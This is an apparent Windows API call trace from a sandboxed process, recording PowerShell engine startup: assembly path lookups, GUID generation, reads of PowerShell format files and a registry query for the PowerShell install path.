	[0751.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0751.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0752.568] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.569] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe6f55a07, Data2=0xfcf5, Data3=0x488c, Data4=([0]=0xa1, [1]=0x60, [2]=0x2a, [3]=0xfc, [4]=0x16, [5]=0x68, [6]=0x1a, [7]=0x98))) returned 0x0
	[0752.570] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8c6490d5, Data2=0x7e19, Data3=0x496b, Data4=([0]=0xbd, [1]=0xee, [2]=0xba, [3]=0xb0, [4]=0xf3, [5]=0x27, [6]=0x29, [7]=0xa8))) returned 0x0
	[0752.571] VirtualQuery (in: lpAddress=0xcbcb0, lpBuffer=0xccb70, dwLength=0x30 | out: lpBuffer=0xccb70*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.571] VirtualQuery (in: lpAddress=0xcbcb0, lpBuffer=0xccb70, dwLength=0x30 | out: lpBuffer=0xccb70*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.572] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc2e54e1e, Data2=0x5cf, Data3=0x40ad, Data4=([0]=0x86, [1]=0x76, [2]=0xda, [3]=0xb9, [4]=0x79, [5]=0x11, [6]=0x46, [7]=0x7a))) returned 0x0
	[0752.575] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9c2938aa, Data2=0x9e00, Data3=0x40b4, Data4=([0]=0x97, [1]=0x44, [2]=0xea, [3]=0xe9, [4]=0x70, [5]=0x5f, [6]=0x39, [7]=0x87))) returned 0x0
	[0752.575] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xa9a1cf6f, Data2=0x98a5, Data3=0x4f5a, Data4=([0]=0x94, [1]=0xdd, [2]=0x31, [3]=0x1f, [4]=0x6e, [5]=0xe6, [6]=0x32, [7]=0xab))) returned 0x0
	[0752.576] VirtualQuery (in: lpAddress=0xcb570, lpBuffer=0xcc430, dwLength=0x30 | out: lpBuffer=0xcc430*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0752.577] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x6e5a6af9, Data2=0x1eb8, Data3=0x48eb, Data4=([0]=0xb8, [1]=0x64, [2]=0xe5, [3]=0x6d, [4]=0x5d, [5]=0x16, [6]=0xce, [7]=0x94))) returned 0x0
	[0752.577] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x861084b, Data2=0xc34d, Data3=0x4a8d, Data4=([0]=0x8b, [1]=0x3f, [2]=0x4c, [3]=0x87, [4]=0x18, [5]=0xbe, [6]=0x48, [7]=0xe8))) returned 0x0
	[0752.577] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0752.577] GetFileType (hFile=0x198) returned 0x1
	[0752.577] SetErrorMode (uMode=0x1) returned 0x1
	[0752.577] GetFileType (hFile=0x198) returned 0x1
	[0752.578] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.578] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.578] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.578] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.578] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.579] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.579] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.579] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.581] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.581] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.582] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.582] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.582] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.583] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.584] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.584] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.588] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0752.588] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0xbce, lpOverlapped=0x0) returned 1
	[0752.589] ReadFile (in: hFile=0x198, lpBuffer=0x33a7c06, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a7c06*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0752.589] ReadFile (in: hFile=0x198, lpBuffer=0x33a84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x33a84d0*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0752.589] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0752.589] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0752.589] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0752.589] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0752.589] CoTaskMemFree (pv=0x286c4e0) 
	[0752.590] RegCloseKey (hKey=0x198) returned 0x0
	[0752.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0752.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0752.591] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xf980b230, Data2=0x6fb, Data3=0x40cc, Data4=([0]=0xbb, [1]=0x5d, [2]=0x54, [3]=0x1d, [4]=0x3a, [5]=0x47, [6]=0xa8, [7]=0x68))) returned 0x0
	[0752.591] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xae867315, Data2=0xaa43, Data3=0x4f20, Data4=([0]=0x9c, [1]=0x2c, [2]=0x76, [3]=0x19, [4]=0x45, [5]=0x61, [6]=0x6a, [7]=0x67))) returned 0x0
	[0752.591] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc7f343cc, Data2=0xe1c1, Data3=0x4c55, Data4=([0]=0xb5, [1]=0xce, [2]=0x3f, [3]=0x85, [4]=0x66, [5]=0xd5, [6]=0xc3, [7]=0x13))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x94696589, Data2=0x812c, Data3=0x443c, Data4=([0]=0xac, [1]=0xdf, [2]=0xe0, [3]=0x31, [4]=0x49, [5]=0x9e, [6]=0xc7, [7]=0xd4))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x51f1ec78, Data2=0x5dd4, Data3=0x4909, Data4=([0]=0x99, [1]=0xa4, [2]=0x25, [3]=0xbd, [4]=0x8b, [5]=0x70, [6]=0x70, [7]=0x71))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x70df4247, Data2=0x2941, Data3=0x43e2, Data4=([0]=0x9c, [1]=0xcf, [2]=0x7c, [3]=0xf8, [4]=0x70, [5]=0xc1, [6]=0xc1, [7]=0x4b))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9412903e, Data2=0xf2ad, Data3=0x4203, Data4=([0]=0x9b, [1]=0x7d, [2]=0x76, [3]=0xfb, [4]=0xc3, [5]=0x63, [6]=0x62, [7]=0x1d))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x3a1f09ce, Data2=0x8cb6, Data3=0x4179, Data4=([0]=0x9f, [1]=0xba, [2]=0x98, [3]=0xe5, [4]=0x4, [5]=0xef, [6]=0xc5, [7]=0x99))) returned 0x0
	[0752.592] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9e2bf2b, Data2=0xba14, Data3=0x476a, Data4=([0]=0x85, [1]=0xf1, [2]=0x6e, [3]=0xf6, [4]=0x38, [5]=0xe5, [6]=0x38, [7]=0x4))) returned 0x0
	[0752.593] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe97bd89, Data2=0x3aac, Data3=0x4b15, Data4=([0]=0xa3, [1]=0x40, [2]=0xf2, [3]=0xd2, [4]=0x2f, [5]=0x43, [6]=0x49, [7]=0xc4))) returned 0x0
	[0752.593] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x85be400b, Data2=0xd2b7, Data3=0x48fb, Data4=([0]=0x9b, [1]=0xe3, [2]=0xcc, [3]=0x9c, [4]=0x86, [5]=0xae, [6]=0x4c, [7]=0x94))) returned 0x0
	[0752.593] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x4144bcc5, Data2=0x4858, Data3=0x4dc8, Data4=([0]=0x9d, [1]=0x87, [2]=0x5a, [3]=0xe1, [4]=0xb2, [5]=0x7f, [6]=0xff, [7]=0x52))) returned 0x0
	[0752.593] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x6b4ff4fe, Data2=0xd1c6, Data3=0x41a0, Data4=([0]=0x9c, [1]=0x3c, [2]=0x2b, [3]=0x3b, [4]=0xe7, [5]=0xfe, [6]=0x54, [7]=0xfe))) returned 0x0
	[0752.593] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x86feb5f1, Data2=0x5f87, Data3=0x4247, Data4=([0]=0xbb, [1]=0x24, [2]=0x4e, [3]=0x85, [4]=0xec, [5]=0x27, [6]=0x46, [7]=0xa1))) returned 0x0
	[0752.594] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xb07afff2, Data2=0xc919, Data3=0x4c51, Data4=([0]=0x91, [1]=0x6, [2]=0xbc, [3]=0x6f, [4]=0x23, [5]=0xb8, [6]=0x5f, [7]=0x57))) returned 0x0
	[0753.828] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x21b8a3c8, Data2=0xd5ac, Data3=0x4184, Data4=([0]=0x95, [1]=0xed, [2]=0x74, [3]=0xd, [4]=0x45, [5]=0x13, [6]=0xfc, [7]=0x35))) returned 0x0
	[0753.828] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xaade1c43, Data2=0xb3, Data3=0x4744, Data4=([0]=0xa7, [1]=0xf4, [2]=0xb4, [3]=0x89, [4]=0x58, [5]=0x85, [6]=0xd7, [7]=0xad))) returned 0x0
	[0753.829] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xb9f91a13, Data2=0x1c3c, Data3=0x4372, Data4=([0]=0xb3, [1]=0x6a, [2]=0x93, [3]=0xef, [4]=0xc0, [5]=0x8, [6]=0x64, [7]=0x91))) returned 0x0
	[0753.829] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2a4f0834, Data2=0xfd77, Data3=0x44cd, Data4=([0]=0x92, [1]=0x22, [2]=0x6c, [3]=0x40, [4]=0xd6, [5]=0x33, [6]=0xc8, [7]=0xa6))) returned 0x0
	[0753.829] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9753d826, Data2=0xe75c, Data3=0x4fd9, Data4=([0]=0xb1, [1]=0xd7, [2]=0x63, [3]=0xdd, [4]=0x44, [5]=0x6e, [6]=0xb7, [7]=0x10))) returned 0x0
	[0753.829] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x89590ca, Data2=0x2df8, Data3=0x4d28, Data4=([0]=0xa8, [1]=0xdd, [2]=0x54, [3]=0xaa, [4]=0x21, [5]=0xcc, [6]=0x68, [7]=0x78))) returned 0x0
	[0753.829] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2632cdbb, Data2=0x67a3, Data3=0x44cd, Data4=([0]=0x96, [1]=0xde, [2]=0x13, [3]=0xa9, [4]=0x83, [5]=0xda, [6]=0x11, [7]=0xcc))) returned 0x0
	[0753.830] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc3583276, Data2=0x29f1, Data3=0x42f8, Data4=([0]=0x88, [1]=0xe8, [2]=0x76, [3]=0xba, [4]=0x34, [5]=0x73, [6]=0xc0, [7]=0xf6))) returned 0x0
	[0753.830] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x69cf6eff, Data2=0x5e3d, Data3=0x4415, Data4=([0]=0xa5, [1]=0x11, [2]=0xe2, [3]=0xb2, [4]=0x5b, [5]=0x2f, [6]=0xa, [7]=0x95))) returned 0x0
	[0753.830] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x1d8aec96, Data2=0x4011, Data3=0x4f3d, Data4=([0]=0x9a, [1]=0x5a, [2]=0x2e, [3]=0x98, [4]=0x55, [5]=0x92, [6]=0x81, [7]=0xcb))) returned 0x0
	[0753.831] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x57637df4, Data2=0xcc58, Data3=0x4622, Data4=([0]=0xaa, [1]=0x11, [2]=0xe1, [3]=0x43, [4]=0x7e, [5]=0xf1, [6]=0xa8, [7]=0x93))) returned 0x0
	[0753.831] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xef78490a, Data2=0xaefa, Data3=0x4624, Data4=([0]=0x8c, [1]=0x47, [2]=0xc7, [3]=0x7f, [4]=0xdb, [5]=0x9a, [6]=0xf4, [7]=0x51))) returned 0x0
	[0753.831] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x3c098da5, Data2=0x92dd, Data3=0x419e, Data4=([0]=0xb7, [1]=0x64, [2]=0x71, [3]=0x7, [4]=0x96, [5]=0xb9, [6]=0x2, [7]=0xa2))) returned 0x0
	[0753.832] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xf25927e6, Data2=0xed20, Data3=0x4141, Data4=([0]=0xaa, [1]=0x24, [2]=0xc0, [3]=0x6a, [4]=0xe2, [5]=0xfb, [6]=0x59, [7]=0x4f))) returned 0x0
	[0753.832] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xb69770d9, Data2=0xbe48, Data3=0x4be2, Data4=([0]=0xb6, [1]=0x6b, [2]=0x71, [3]=0x9b, [4]=0xeb, [5]=0x10, [6]=0x55, [7]=0xb8))) returned 0x0
	[0753.832] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x26277cd3, Data2=0x7bb2, Data3=0x40ee, Data4=([0]=0x85, [1]=0xc3, [2]=0x7f, [3]=0x35, [4]=0x28, [5]=0x13, [6]=0xff, [7]=0x83))) returned 0x0
	[0753.833] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xd083d86b, Data2=0x6622, Data3=0x491f, Data4=([0]=0xb0, [1]=0x7d, [2]=0x97, [3]=0x12, [4]=0xe4, [5]=0x70, [6]=0x4b, [7]=0xf2))) returned 0x0
	[0753.833] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9977c999, Data2=0xa1db, Data3=0x4a1e, Data4=([0]=0x9b, [1]=0xb, [2]=0x52, [3]=0x68, [4]=0x55, [5]=0xb0, [6]=0xd, [7]=0x8d))) returned 0x0
	[0753.833] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x3ad8c, Data2=0x8331, Data3=0x4059, Data4=([0]=0x97, [1]=0xe7, [2]=0x6b, [3]=0xc7, [4]=0xa0, [5]=0xa3, [6]=0x21, [7]=0xe9))) returned 0x0
	[0753.833] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x86293830, Data2=0xa090, Data3=0x4fc4, Data4=([0]=0xaf, [1]=0x57, [2]=0xab, [3]=0xb8, [4]=0xbc, [5]=0xcf, [6]=0xf0, [7]=0xb1))) returned 0x0
	[0753.834] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xa801a9cc, Data2=0x5c74, Data3=0x43f0, Data4=([0]=0xa5, [1]=0xd6, [2]=0xe3, [3]=0xd8, [4]=0x63, [5]=0x5c, [6]=0x4a, [7]=0xea))) returned 0x0
	[0753.852] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x85eba537, Data2=0x178d, Data3=0x4312, Data4=([0]=0xa7, [1]=0x74, [2]=0xd9, [3]=0x8f, [4]=0x63, [5]=0xe, [6]=0x5, [7]=0xb4))) returned 0x0
	[0753.853] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0753.853] GetFileType (hFile=0x198) returned 0x1
	[0753.853] SetErrorMode (uMode=0x1) returned 0x1
	[0753.853] GetFileType (hFile=0x198) returned 0x1
	[0753.853] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.854] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.855] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.855] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.857] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.857] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0753.857] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x119, lpOverlapped=0x0) returned 1
	[0753.858] ReadFile (in: hFile=0x198, lpBuffer=0x34b8c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x34b8c90*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0755.059] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0755.059] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0755.059] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0755.059] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0755.060] CoTaskMemFree (pv=0x286c4e0) 
	[0755.060] RegCloseKey (hKey=0x198) returned 0x0
	[0755.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.061] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x63b64cdf, Data2=0xf715, Data3=0x43c0, Data4=([0]=0xb9, [1]=0x84, [2]=0x42, [3]=0x55, [4]=0x36, [5]=0xf7, [6]=0xaa, [7]=0x6))) returned 0x0
	[0755.061] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x45423758, Data2=0x4d9c, Data3=0x472b, Data4=([0]=0xa8, [1]=0x4e, [2]=0xe0, [3]=0x27, [4]=0x5c, [5]=0xde, [6]=0x5c, [7]=0x9b))) returned 0x0
	[0755.061] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x6cac7c4c, Data2=0x9125, Data3=0x4aa8, Data4=([0]=0x9a, [1]=0x2f, [2]=0xa5, [3]=0xa0, [4]=0x79, [5]=0x39, [6]=0xb3, [7]=0x4f))) returned 0x0
